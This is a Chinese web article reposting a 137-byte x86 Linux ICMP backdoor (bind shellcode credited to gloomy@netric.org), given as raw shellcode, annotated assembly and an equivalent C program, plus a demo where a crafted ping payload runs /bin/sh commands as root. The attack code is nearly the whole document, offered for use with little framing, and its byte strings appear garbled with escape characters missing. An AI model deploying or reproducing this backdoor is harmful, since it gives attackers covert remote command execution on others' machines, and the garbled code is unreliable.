在不少协议的应用都存在着一些后门。例如我们今天将要介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。使用Ping控制程序:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[example]
main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137
main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SECRET_CHAR "x99"
char shell[] =
"x31xc0x31xdbx31xc9xb0x66"
"x43x41x51xb1x03x51x49x51"
"x89xe1xcdx80x89xc2xb0x02"
"xcdx80x31xdbx39xc3x75x55"
"x31xc0x31xdbxb0x10x50xb0"
"xffx54x54x53x50x55x52x89"
"xe1xb0x66xb3x0cxcdx80x89"
"xe9x01xc1x31xc0x88x41xfe"
"xb0x25x01xc5xb0" SECRET_CHAR
"x32x45xffx75xd5xb0x02xcd"
"x80x31xdbx39xc3x74x25xeb"
"xc9x31xc0x31xdbxb3x02xb0"
"x06xcdx80x5bx89xd9x88x43"
"x07x80xc1x08x50x55x51x53"
"x89xe1x99xb0x0bxcdx80x31"
"xc0x40xcdx80xe8xd8xffxff"
"xff"
"/bin/sh -c";
void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit
endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */
pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80 /* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
stack:
call execve
.string "/bin/sh -c"
");
}
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
}
}
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %dnn",strlen(shell));
i();
return 0;
那么,具体的Linux ICMP后门查看方法我们就呈现出来了。
推荐阅读
在ICMP协议的应用中,我们使用Ping命令进行操作的任务也是比较多的。那么这里我们主要介绍的就是Linux下用ICMP实现简单的Ping功能。如果目的主机在工 输出在工状态 如果5妙内无相应 用SIGALRM信号中断进程。那么现在>>>详细阅读
本文标题:Linux ICMP后门代码
地址:http://www.17bianji.com/xieyi/5594.html
1/2 1